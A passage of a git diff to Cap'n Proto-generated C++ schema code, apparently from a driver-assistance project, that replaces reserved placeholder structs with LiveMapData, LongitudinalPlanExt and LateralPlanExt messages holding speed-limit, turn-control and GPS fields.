0, 0, 0, 0, 0, 0, + 10, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 10, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 100, 105, 115, 116, 84, 111, 83, 112, + 101, 101, 100, 76, 105, 109, 105, 116, + 0, 0, 0, 0, 0, 0, 0, 0, + 10, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 10, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 105, 115, 77, 97, 112, 83, 112, 101, + 101, 100, 76, 105, 109, 105, 116, 0, + 1, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 1, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 115, 112, 101, 101, 100, 76, 105, 109, + 105, 116, 80, 101, 114, 99, 79, 102, + 102, 115, 101, 116, 0, 0, 0, 0, + 1, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 1, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 115, 112, 101, 101, 100, 76, 105, 109, + 105, 116, 86, 97, 108, 117, 101, 79, + 102, 102, 115, 101, 116, 0, 0, 0, + 10, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 10, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 100, 105, 115, 116, 84, 111, 84, 117, + 114, 110, 0, 0, 0, 0, 0, 0, + 10, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 10, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 116, 117, 114, 110, 83, 112, 101, 101, + 100, 0, 0, 0, 0, 0, 0, 0, + 10, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 10, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 116, 117, 114, 110, 83, 112, 101, 101, + 100, 67, 111, 110, 116, 114, 111, 108, + 83, 116, 97, 116, 101, 0, 0, 0, + 15, 0, 0, 0, 0, 0, 0, 0, + 2, 8, 153, 155, 54, 132, 119, 158, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 15, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 116, 117, 114, 110, 83, 105, 103, 110, + 0, 0, 0, 0, 0, 0, 0, 0, + 3, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 3, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 100, 112, 69, 50, 69, 73, 115, 66, + 108, 101, 110, 100, 101, 100, 0, 0, + 1, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 1, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 108, 111, 110, 103, 105, 116, 117, 100, + 105, 110, 97, 108, 80, 108, 97, 110, + 69, 120, 116, 83, 111, 117, 114, 99, + 101, 0, 0, 0, 0, 0, 0, 0, + 15, 0, 0, 0, 0, 0, 0, 0, + 206, 31, 115, 238, 186, 117, 42, 180, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 15, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, } }; ::capnp::word const* const bp_aedffd8f31e7b55d = b_aedffd8f31e7b55d.words; #if !CAPNP_LITE +static const ::capnp::_::RawSchema* const d_aedffd8f31e7b55d[] = { + &s_9e7784369b990802, + &s_b42a75baee731fce, + &s_d1124e845254aeda, +}; +static const uint16_t m_aedffd8f31e7b55d[] = {5, 9, 13, 6, 14, 3, 2, 4, 7, 8, 12, 10, 11, 0, 1}; +static const uint16_t i_aedffd8f31e7b55d[] = {0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14}; const ::capnp::_::RawSchema s_aedffd8f31e7b55d = { - 0xaedffd8f31e7b55d, b_aedffd8f31e7b55d.words, 17, nullptr, nullptr, - 0, 0, nullptr, nullptr, nullptr, { &s_aedffd8f31e7b55d, nullptr, nullptr, 0, 0, nullptr } + 0xaedffd8f31e7b55d, b_aedffd8f31e7b55d.words, 286, d_aedffd8f31e7b55d, m_aedffd8f31e7b55d, + 3, 15, i_aedffd8f31e7b55d, nullptr, nullptr, { &s_aedffd8f31e7b55d, nullptr, nullptr, 0, 0, nullptr } }; #endif // !CAPNP_LITE -static const ::capnp::_::AlignedData<17> b_f35cc4560bbf6ec2 = { +static const ::capnp::_::AlignedData<55> b_b42a75baee731fce = { + { 0, 0, 0, 0, 5, 0, 6, 0, + 206, 31, 115, 238, 186, 117, 42, 180, + 33, 0, 0, 0, 2, 0, 0, 0, + 93, 181, 231, 49, 143, 253, 223, 174, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 21, 0, 0, 0, 218, 1, 0, 0, + 49, 0, 0, 0, 7, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 45, 0, 0, 0, 199, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 99, 117, 115, 116, 111, 109, 46, 99, + 97, 112, 110, 112, 58, 76, 111, 110, + 103, 105, 116, 117, 100, 105, 110, 97, + 108, 80, 108, 97, 110, 69, 120, 116, + 46, 76, 111, 110, 103, 105, 116, 117, + 100, 105, 110, 97, 108, 80, 108, 97, + 110, 69, 120, 116, 83, 111, 117, 114, + 99, 101, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 1, 0, 1, 0, + 32, 0, 0, 0, 1, 0, 2, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 89, 0, 0, 0, 58, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 1, 0, 0, 0, 0, 0, 0, 0, + 81, 0, 0, 0, 50, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 2, 0, 0, 0, 0, 0, 0, 0, + 73, 0, 0, 0, 50, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 3, 0, 0, 0, 0, 0, 0, 0, + 65, 0, 0, 0, 50, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 4, 0, 0, 0, 0, 0, 0, 0, + 57, 0, 0, 0, 34, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 5, 0, 0, 0, 0, 0, 0, 0, + 49, 0, 0, 0, 42, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 6, 0, 0, 0, 0, 0, 0, 0, + 41, 0, 0, 0, 50, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 7, 0, 0, 0, 0, 0, 0, 0, + 33, 0, 0, 0, 82, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 99, 114, 117, 105, 115, 101, 0, 0, + 108, 101, 97, 100, 48, 0, 0, 0, + 108, 101, 97, 100, 49, 0, 0, 0, + 108, 101, 97, 100, 50, 0, 0, 0, + 101, 50, 101, 0, 0, 0, 0, 0, + 116, 117, 114, 110, 0, 0, 0, 0, + 108, 105, 109, 105, 116, 0, 0, 0, + 116, 117, 114, 110, 108, 105, 109, 105, + 116, 0, 0, 0, 0, 0, 0, 0, } +}; +::capnp::word const* const bp_b42a75baee731fce = b_b42a75baee731fce.words; +#if !CAPNP_LITE +static const uint16_t m_b42a75baee731fce[] = {0, 4, 1, 2, 3, 6, 5, 7}; +const ::capnp::_::RawSchema s_b42a75baee731fce = { + 0xb42a75baee731fce, b_b42a75baee731fce.words, 55, nullptr, m_b42a75baee731fce, + 0, 8, nullptr, nullptr, nullptr, { &s_b42a75baee731fce, nullptr, nullptr, 0, 0, nullptr } +}; +#endif // !CAPNP_LITE +CAPNP_DEFINE_ENUM(LongitudinalPlanExtSource_b42a75baee731fce, b42a75baee731fce); +static const ::capnp::_::AlignedData<40> b_9e7784369b990802 = { + { 0, 0, 0, 0, 5, 0, 6, 0, + 2, 8, 153, 155, 54, 132, 119, 158, + 33, 0, 0, 0, 2, 0, 0, 0, + 93, 181, 231, 49, 143, 253, 223, 174, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 21, 0, 0, 0, 194, 1, 0, 0, + 45, 0, 0, 0, 7, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 41, 0, 0, 0, 103, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 99, 117, 115, 116, 111, 109, 46, 99, + 97, 112, 110, 112, 58, 76, 111, 110, + 103, 105, 116, 117, 100, 105, 110, 97, + 108, 80, 108, 97, 110, 69, 120, 116, + 46, 83, 112, 101, 101, 100, 76, 105, + 109, 105, 116, 67, 111, 110, 116, 114, + 111, 108, 83, 116, 97, 116, 101, 0, + 0, 0, 0, 0, 1, 0, 1, 0, + 16, 0, 0, 0, 1, 0, 2, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 41, 0, 0, 0, 74, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 1, 0, 0, 0, 0, 0, 0, 0, + 37, 0, 0, 0, 106, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 2, 0, 0, 0, 0, 0, 0, 0, + 33, 0, 0, 0, 74, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 3, 0, 0, 0, 0, 0, 0, 0, + 29, 0, 0, 0, 58, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 105, 110, 97, 99, 116, 105, 118, 101, + 0, 0, 0, 0, 0, 0, 0, 0, + 116, 101, 109, 112, 73, 110, 97, 99, + 116, 105, 118, 101, 0, 0, 0, 0, + 97, 100, 97, 112, 116, 105, 110, 103, + 0, 0, 0, 0, 0, 0, 0, 0, + 97, 99, 116, 105, 118, 101, 0, 0, } +}; +::capnp::word const* const bp_9e7784369b990802 = b_9e7784369b990802.words; +#if !CAPNP_LITE +static const uint16_t m_9e7784369b990802[] = {3, 2, 0, 1}; +const ::capnp::_::RawSchema s_9e7784369b990802 = { + 0x9e7784369b990802, b_9e7784369b990802.words, 40, nullptr, m_9e7784369b990802, + 0, 4, nullptr, nullptr, nullptr, { &s_9e7784369b990802, nullptr, nullptr, 0, 0, nullptr } +}; +#endif // !CAPNP_LITE +CAPNP_DEFINE_ENUM(SpeedLimitControlState_9e7784369b990802, 9e7784369b990802); +static const ::capnp::_::AlignedData<40> b_d1124e845254aeda = { + { 0, 0, 0, 0, 5, 0, 6, 0, + 218, 174, 84, 82, 132, 78, 18, 209, + 33, 0, 0, 0, 2, 0, 0, 0, + 93, 181, 231, 49, 143, 253, 223, 174, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 21, 0, 0, 0, 218, 1, 0, 0, + 49, 0, 0, 0, 7, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 45, 0, 0, 0, 103, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 99, 117, 115, 116, 111, 109, 46, 99, + 97, 112, 110, 112, 58, 76, 111, 110, + 103, 105, 116, 117, 100, 105, 110, 97, + 108, 80, 108, 97, 110, 69, 120, 116, + 46, 86, 105, 115, 105, 111, 110, 84, + 117, 114, 110, 67, 111, 110, 116, 114, + 111, 108, 108, 101, 114, 83, 116, 97, + 116, 101, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 1, 0, 1, 0, + 16, 0, 0, 0, 1, 0, 2, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 41, 0, 0, 0, 74, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 1, 0, 0, 0, 0, 0, 0, 0, + 37, 0, 0, 0, 74, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 2, 0, 0, 0, 0, 0, 0, 0, + 33, 0, 0, 0, 66, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 3, 0, 0, 0, 0, 0, 0, 0, + 25, 0, 0, 0, 66, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 100, 105, 115, 97, 98, 108, 101, 100, + 0, 0, 0, 0, 0, 0, 0, 0, + 101, 110, 116, 101, 114, 105, 110, 103, + 0, 0, 0, 0, 0, 0, 0, 0, + 116, 117, 114, 110, 105, 110, 103, 0, + 108, 101, 97, 118, 105, 110, 103, 0, } +}; +::capnp::word const* const bp_d1124e845254aeda = b_d1124e845254aeda.words; +#if !CAPNP_LITE +static const uint16_t m_d1124e845254aeda[] = {0, 1, 3, 2}; +const ::capnp::_::RawSchema s_d1124e845254aeda = { + 0xd1124e845254aeda, b_d1124e845254aeda.words, 40, nullptr, m_d1124e845254aeda, + 0, 4, nullptr, nullptr, nullptr, { &s_d1124e845254aeda, nullptr, nullptr, 0, 0, nullptr } +}; +#endif // !CAPNP_LITE +CAPNP_DEFINE_ENUM(VisionTurnControllerState_d1124e845254aeda, d1124e845254aeda); +static const ::capnp::_::AlignedData<58> b_f35cc4560bbf6ec2 = { { 0, 0, 0, 0, 5, 0, 6, 0, 194, 110, 191, 11, 86, 196, 92, 243, 13, 0, 0, 0, 1, 0, 0, 0, 89, 10, 85, 29, 102, 186, 38, 181, - 0, 0, 7, 0, 0, 0, 0, 0, + 2, 0, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 21, 0, 0, 0, 234, 0, 0, 0, + 21, 0, 0, 0, 226, 0, 0, 0, 33, 0, 0, 0, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, + 29, 0, 0, 0, 119, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 99, 117, 115, 116, 111, 109, 46, 99, - 97, 112, 110, 112, 58, 67, 117, 115, - 116, 111, 109, 82, 101, 115, 101, 114, - 118, 101, 100, 50, 0, 0, 0, 0, - 0, 0, 0, 0, 1, 0, 1, 0, } + 97, 112, 110, 112, 58, 76, 97, 116, + 101, 114, 97, 108, 80, 108, 97, 110, + 69, 120, 116, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 1, 0, 1, 0, + 8, 0, 0, 0, 3, 0, 4, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 1, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 41, 0, 0, 0, 106, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 40, 0, 0, 0, 3, 0, 1, 0, + 68, 0, 0, 0, 2, 0, 1, 0, + 1, 0, 0, 0, 1, 0, 0, 0, + 0, 0, 1, 0, 1, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 65, 0, 0, 0, 106, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 64, 0, 0, 0, 3, 0, 1, 0, + 92, 0, 0, 0, 2, 0, 1, 0, + 100, 80, 97, 116, 104, 87, 76, 105, + 110, 101, 115, 88, 0, 0, 0, 0, + 14, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 3, 0, 1, 0, + 10, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 14, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 100, 80, 97, 116, 104, 87, 76, 105, + 110, 101, 115, 89, 0, 0, 0, 0, + 14, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 3, 0, 1, 0, + 10, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 14, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, } }; ::capnp::word const* const bp_f35cc4560bbf6ec2 = b_f35cc4560bbf6ec2.words; #if !CAPNP_LITE +static const uint16_t m_f35cc4560bbf6ec2[] = {0, 1}; +static const uint16_t i_f35cc4560bbf6ec2[] = {0, 1}; const ::capnp::_::RawSchema s_f35cc4560bbf6ec2 = { - 0xf35cc4560bbf6ec2, b_f35cc4560bbf6ec2.words, 17, nullptr, nullptr, - 0, 0, nullptr, nullptr, nullptr, { &s_f35cc4560bbf6ec2, nullptr, nullptr, 0, 0, nullptr } + 0xf35cc4560bbf6ec2, b_f35cc4560bbf6ec2.words, 58, nullptr, m_f35cc4560bbf6ec2, + 0, 2, i_f35cc4560bbf6ec2, nullptr, nullptr, { &s_f35cc4560bbf6ec2, nullptr, nullptr, 0, 0, nullptr } }; #endif // !CAPNP_LITE static const ::capnp::_::AlignedData<17> b_da96579883444c35 = { @@ -272,28 +1110,28 @@ const ::capnp::_::RawSchema s_a1680744031fdb2d = { namespace cereal { -// CustomReserved0 -constexpr uint16_t CustomReserved0::_capnpPrivate::dataWordSize; -constexpr uint16_t CustomReserved0::_capnpPrivate::pointerCount; +// LiveMapData +constexpr uint16_t LiveMapData::_capnpPrivate::dataWordSize; +constexpr uint16_t LiveMapData::_capnpPrivate::pointerCount; #if !CAPNP_LITE -constexpr ::capnp::Kind CustomReserved0::_capnpPrivate::kind; -constexpr ::capnp::_::RawSchema const* CustomReserved0::_capnpPrivate::schema; +constexpr ::capnp::Kind LiveMapData::_capnpPrivate::kind; +constexpr ::capnp::_::RawSchema const* LiveMapData::_capnpPrivate::schema; #endif // !CAPNP_LITE -// CustomReserved1 -constexpr uint16_t CustomReserved1::_capnpPrivate::dataWordSize; -constexpr uint16_t CustomReserved1::_capnpPrivate::pointerCount; +// LongitudinalPlanExt +constexpr uint16_t LongitudinalPlanExt::_capnpPrivate::dataWordSize; +constexpr uint16_t LongitudinalPlanExt::_capnpPrivate::pointerCount; #if !CAPNP_LITE -constexpr ::capnp::Kind CustomReserved1::_capnpPrivate::kind; -constexpr ::capnp::_::RawSchema const* CustomReserved1::_capnpPrivate::schema; +constexpr ::capnp::Kind LongitudinalPlanExt::_capnpPrivate::kind; +constexpr ::capnp::_::RawSchema const* LongitudinalPlanExt::_capnpPrivate::schema; #endif // !CAPNP_LITE -// CustomReserved2 -constexpr uint16_t CustomReserved2::_capnpPrivate::dataWordSize; -constexpr uint16_t CustomReserved2::_capnpPrivate::pointerCount; +// LateralPlanExt +constexpr uint16_t LateralPlanExt::_capnpPrivate::dataWordSize; +constexpr uint16_t LateralPlanExt::_capnpPrivate::pointerCount; #if !CAPNP_LITE -constexpr ::capnp::Kind CustomReserved2::_capnpPrivate::kind; -constexpr ::capnp::_::RawSchema const* CustomReserved2::_capnpPrivate::schema; +constexpr ::capnp::Kind LateralPlanExt::_capnpPrivate::kind; +constexpr ::capnp::_::RawSchema const* LateralPlanExt::_capnpPrivate::schema; #endif // !CAPNP_LITE // CustomReserved3 diff --git a/cereal/gen/cpp/custom.capnp.h b/cereal/gen/cpp/custom.capnp.h index 89d791f7a..856a99aac 100644 --- a/cereal/gen/cpp/custom.capnp.h +++ b/cereal/gen/cpp/custom.capnp.h @@ -16,6 +16,34 @@ namespace schemas { CAPNP_DECLARE_SCHEMA(81c2f05a394cf4af); CAPNP_DECLARE_SCHEMA(aedffd8f31e7b55d); +CAPNP_DECLARE_SCHEMA(b42a75baee731fce); +enum class LongitudinalPlanExtSource_b42a75baee731fce: uint16_t { + CRUISE, + LEAD0, + LEAD1, + LEAD2, + E2E, + TURN, + LIMIT, + TURNLIMIT, +}; +CAPNP_DECLARE_ENUM(LongitudinalPlanExtSource, b42a75baee731fce); +CAPNP_DECLARE_SCHEMA(9e7784369b990802); +enum class SpeedLimitControlState_9e7784369b990802: uint16_t { + INACTIVE, + TEMP_INACTIVE, + ADAPTING, + ACTIVE, +}; +CAPNP_DECLARE_ENUM(SpeedLimitControlState, 9e7784369b990802); +CAPNP_DECLARE_SCHEMA(d1124e845254aeda); +enum class VisionTurnControllerState_d1124e845254aeda: uint16_t { + DISABLED, + ENTERING, + TURNING, + LEAVING, +}; +CAPNP_DECLARE_ENUM(VisionTurnControllerState, d1124e845254aeda); CAPNP_DECLARE_SCHEMA(f35cc4560bbf6ec2); CAPNP_DECLARE_SCHEMA(da96579883444c35); CAPNP_DECLARE_SCHEMA(80ae746ee2596b11); @@ -30,45 +58,51 @@ CAPNP_DECLARE_SCHEMA(a1680744031fdb2d); namespace cereal { -struct CustomReserved0 { - CustomReserved0() = delete; +struct LiveMapData { + LiveMapData() = delete; class Reader; class Builder; class Pipeline; struct _capnpPrivate { - CAPNP_DECLARE_STRUCT_HEADER(81c2f05a394cf4af, 0, 0) + CAPNP_DECLARE_STRUCT_HEADER(81c2f05a394cf4af, 8, 4) #if !CAPNP_LITE static constexpr ::capnp::_::RawBrandedSchema const* brand() { return &schema->defaultBrand; } #endif // !CAPNP_LITE }; }; -struct CustomReserved1 { - CustomReserved1() = delete; +struct LongitudinalPlanExt { + LongitudinalPlanExt() = delete; class Reader; class Builder; class Pipeline; + typedef ::capnp::schemas::LongitudinalPlanExtSource_b42a75baee731fce LongitudinalPlanExtSource; + + typedef ::capnp::schemas::SpeedLimitControlState_9e7784369b990802 SpeedLimitControlState; + + typedef ::capnp::schemas::VisionTurnControllerState_d1124e845254aeda VisionTurnControllerState; + struct _capnpPrivate { - CAPNP_DECLARE_STRUCT_HEADER(aedffd8f31e7b55d, 0, 0) + CAPNP_DECLARE_STRUCT_HEADER(aedffd8f31e7b55d, 5, 0) #if !CAPNP_LITE static constexpr ::capnp::_::RawBrandedSchema const* brand() { return &schema->defaultBrand; } #endif // !CAPNP_LITE }; }; -struct CustomReserved2 { - CustomReserved2() = delete; +struct LateralPlanExt { + LateralPlanExt() = delete; class Reader; class Builder; class Pipeline; struct _capnpPrivate { - CAPNP_DECLARE_STRUCT_HEADER(f35cc4560bbf6ec2, 0, 0) + CAPNP_DECLARE_STRUCT_HEADER(f35cc4560bbf6ec2, 0, 2) #if !CAPNP_LITE static constexpr ::capnp::_::RawBrandedSchema const* brand() { return &schema->defaultBrand; } #endif // !CAPNP_LITE @@ -182,9 +216,9 @@ struct CustomReserved9 { // ======================================================================================= -class CustomReserved0::Reader { +class LiveMapData::Reader { public: - typedef CustomReserved0 Reads; + typedef LiveMapData Reads; Reader() = default; inline explicit Reader(::capnp::_::StructReader base): _reader(base) {} @@ -199,6 +233,50 @@ public: } #endif // !CAPNP_LITE + inline bool getSpeedLimitValid() const; + + inline float getSpeedLimit() const; + + inline bool getSpeedLimitAheadValid() const; + + inline float getSpeedLimitAhead() const; + + inline float getSpeedLimitAheadDistance() const; + + inline bool getTurnSpeedLimitValid() const; + + inline float getTurnSpeedLimit() const; + + inline float getTurnSpeedLimitEndDistance() const; + + inline ::int16_t getTurnSpeedLimitSign() const; + + inline bool hasTurnSpeedLimitsAhead() const; + inline ::capnp::List::Reader getTurnSpeedLimitsAhead() const; + + inline bool hasTurnSpeedLimitsAheadDistances() const; + inline ::capnp::List::Reader getTurnSpeedLimitsAheadDistances() const; + + inline bool hasTurnSpeedLimitsAheadSigns() const; + inline ::capnp::List< ::int16_t, ::capnp::Kind::PRIMITIVE>::Reader getTurnSpeedLimitsAheadSigns() const; + + inline ::int64_t getLastGpsTimestamp() const; + + inline bool hasCurrentRoadName() const; + inline ::capnp::Text::Reader getCurrentRoadName() const; + + inline double getLastGpsLatitude() const; + + inline double getLastGpsLongitude() const; + + inline float getLastGpsSpeed() const; + + inline float getLastGpsBearingDeg() const; + + inline float getLastGpsAccuracy() const; + + inline float getLastGpsBearingAccuracyDeg() const; + private: ::capnp::_::StructReader _reader; template @@ -211,9 +289,9 @@ private: friend class ::capnp::Orphanage; }; -class CustomReserved0::Builder { +class LiveMapData::Builder { public: - typedef CustomReserved0 Builds; + typedef LiveMapData Builds; Builder() = delete; // Deleted to discourage incorrect usage. // You can explicitly initialize to nullptr instead. @@ -227,6 +305,85 @@ public: inline ::kj::StringTree toString() const { return asReader().toString(); } #endif // !CAPNP_LITE + inline bool getSpeedLimitValid(); + inline void setSpeedLimitValid(bool value); + + inline float getSpeedLimit(); + inline void setSpeedLimit(float value); + + inline bool getSpeedLimitAheadValid(); + inline void setSpeedLimitAheadValid(bool value); + + inline float getSpeedLimitAhead(); + inline void setSpeedLimitAhead(float value); + + inline float getSpeedLimitAheadDistance(); + inline void setSpeedLimitAheadDistance(float value); + + inline bool getTurnSpeedLimitValid(); + inline void setTurnSpeedLimitValid(bool value); + + inline float getTurnSpeedLimit(); + inline void setTurnSpeedLimit(float value); + + inline float getTurnSpeedLimitEndDistance(); + inline void setTurnSpeedLimitEndDistance(float value); + + inline ::int16_t getTurnSpeedLimitSign(); + inline void setTurnSpeedLimitSign( ::int16_t value); + + inline bool hasTurnSpeedLimitsAhead(); + inline ::capnp::List::Builder getTurnSpeedLimitsAhead(); + inline void setTurnSpeedLimitsAhead( ::capnp::List::Reader value); + inline void setTurnSpeedLimitsAhead(::kj::ArrayPtr value); + inline ::capnp::List::Builder initTurnSpeedLimitsAhead(unsigned int size); + inline void adoptTurnSpeedLimitsAhead(::capnp::Orphan< ::capnp::List>&& value); + inline ::capnp::Orphan< ::capnp::List> disownTurnSpeedLimitsAhead(); + + inline bool hasTurnSpeedLimitsAheadDistances(); + inline ::capnp::List::Builder getTurnSpeedLimitsAheadDistances(); + inline void setTurnSpeedLimitsAheadDistances( ::capnp::List::Reader value); + inline void setTurnSpeedLimitsAheadDistances(::kj::ArrayPtr value); + inline ::capnp::List::Builder initTurnSpeedLimitsAheadDistances(unsigned int size); + inline void adoptTurnSpeedLimitsAheadDistances(::capnp::Orphan< ::capnp::List>&& value); + inline ::capnp::Orphan< ::capnp::List> disownTurnSpeedLimitsAheadDistances(); + + inline bool hasTurnSpeedLimitsAheadSigns(); + inline ::capnp::List< ::int16_t, ::capnp::Kind::PRIMITIVE>::Builder getTurnSpeedLimitsAheadSigns(); + inline void setTurnSpeedLimitsAheadSigns( ::capnp::List< ::int16_t, ::capnp::Kind::PRIMITIVE>::Reader value); + inline void setTurnSpeedLimitsAheadSigns(::kj::ArrayPtr value); + inline ::capnp::List< ::int16_t, ::capnp::Kind::PRIMITIVE>::Builder initTurnSpeedLimitsAheadSigns(unsigned int size); + inline void adoptTurnSpeedLimitsAheadSigns(::capnp::Orphan< ::capnp::List< ::int16_t, ::capnp::Kind::PRIMITIVE>>&& value); + inline ::capnp::Orphan< ::capnp::List< ::int16_t, ::capnp::Kind::PRIMITIVE>> disownTurnSpeedLimitsAheadSigns(); + + inline ::int64_t getLastGpsTimestamp(); + inline void setLastGpsTimestamp( ::int64_t value); + + inline bool hasCurrentRoadName(); + inline ::capnp::Text::Builder getCurrentRoadName(); + inline void setCurrentRoadName( ::capnp::Text::Reader value); + inline ::capnp::Text::Builder initCurrentRoadName(unsigned int size); + inline void adoptCurrentRoadName(::capnp::Orphan< ::capnp::Text>&& value); + inline ::capnp::Orphan< ::capnp::Text> disownCurrentRoadName(); + + inline double getLastGpsLatitude(); + inline void setLastGpsLatitude(double value); + + inline double getLastGpsLongitude(); + inline void setLastGpsLongitude(double value); + + inline float getLastGpsSpeed(); + inline void setLastGpsSpeed(float value); + + inline float getLastGpsBearingDeg(); + inline void setLastGpsBearingDeg(float value); + + inline float getLastGpsAccuracy(); + inline void setLastGpsAccuracy(float value); + + inline float getLastGpsBearingAccuracyDeg(); 